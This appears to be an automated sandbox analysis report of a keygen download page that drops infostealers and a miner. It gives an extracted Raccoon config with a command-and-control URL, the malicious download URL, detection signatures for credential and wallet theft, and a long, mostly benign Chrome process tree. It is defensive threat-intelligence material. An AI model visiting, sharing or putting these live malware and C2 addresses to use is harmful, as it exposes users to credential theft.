Resubmissions

17-04-2021 18:41

210417-4m6sdqyqx2 10

17-04-2021 06:29

210417-mvqz54c7re 10

16-04-2021 14:15

210416-aa5qqagyce 10

Analysis

  • max time kernel
    1797s
  • max time network
    1783s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    17-04-2021 06:29

General

  • Target

    https://keygenit.com/d/a941ad21e610ns219454.html

  • Sample

    210417-mvqz54c7re

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:284
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:936
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1100
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1256
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1408
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/a941ad21e610ns219454.html
              1⤵
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:4084
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffbc5314f50,0x7ffbc5314f60,0x7ffbc5314f70
                2⤵
                  PID:576
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
                  2⤵
                    PID:2988
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1684 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3020
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2144 /prefetch:8
                    2⤵
                      PID:3576
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
                      2⤵
                        PID:2680
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
                        2⤵
                          PID:4004
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                          2⤵
                            PID:3856
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                            2⤵
                              PID:2600
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
                              2⤵
                                PID:1192
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
                                2⤵
                                  PID:2676
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4704 /prefetch:8
                                  2⤵
                                    PID:4436
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:8
                                    2⤵
                                      PID:4704
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                                      2⤵
                                        PID:4756
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
                                        2⤵
                                          PID:4808
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:8
                                          2⤵
                                            PID:4844
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:8
                                            2⤵
                                              PID:4880
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
                                              2⤵
                                                PID:4892
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:8
                                                2⤵
                                                  PID:4952
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:8
                                                  2⤵
                                                    PID:4964
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                    2⤵
                                                      PID:5024
                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7dc3ea890,0x7ff7dc3ea8a0,0x7ff7dc3ea8b0
                                                        3⤵
                                                          PID:5056
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:8
                                                        2⤵
                                                          PID:5076
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3792
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
                                                          2⤵
                                                            PID:4148
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6008 /prefetch:8
                                                            2⤵
                                                              PID:4392
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:8
                                                              2⤵
                                                                PID:4280
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6108 /prefetch:8
                                                                2⤵
                                                                  PID:4632
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:8
                                                                  2⤵
                                                                    PID:4484
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:8
                                                                    2⤵
                                                                      PID:4708
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6096 /prefetch:8
                                                                      2⤵
                                                                        PID:4748
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:8
                                                                        2⤵
                                                                          PID:4800
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6340 /prefetch:8
                                                                          2⤵
                                                                            PID:4704
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6332 /prefetch:8
                                                                            2⤵
                                                                              PID:4884
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                                                                              2⤵
                                                                                PID:4972
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:8
                                                                                2⤵
                                                                                  PID:4992
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6888 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5016
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4964
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7124 /prefetch:8
                                                                                      2⤵
                                                                                        PID:5060
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7280 /prefetch:8
                                                                                        2⤵
                                                                                          PID:5080
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7128 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4132
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7708 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4720
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7688 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4756
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8576 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1136
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8700 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5116
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:3984
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7304 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:2228
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8432 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4500
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8308 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5000
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8340 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4996
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8364 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5132
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8396 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5176
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5260
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8156 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5320
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:5408
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5536
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7580 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5612
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5672
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1412 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5716
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:5760
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
                                                                                                                          2⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:5776
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=844 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:5860
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
                                                                                                                            2⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5900
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,2337009581306770509,15740647539947302482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:6036
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                            1⤵
                                                                                                                              PID:2660
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2636
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                              1⤵
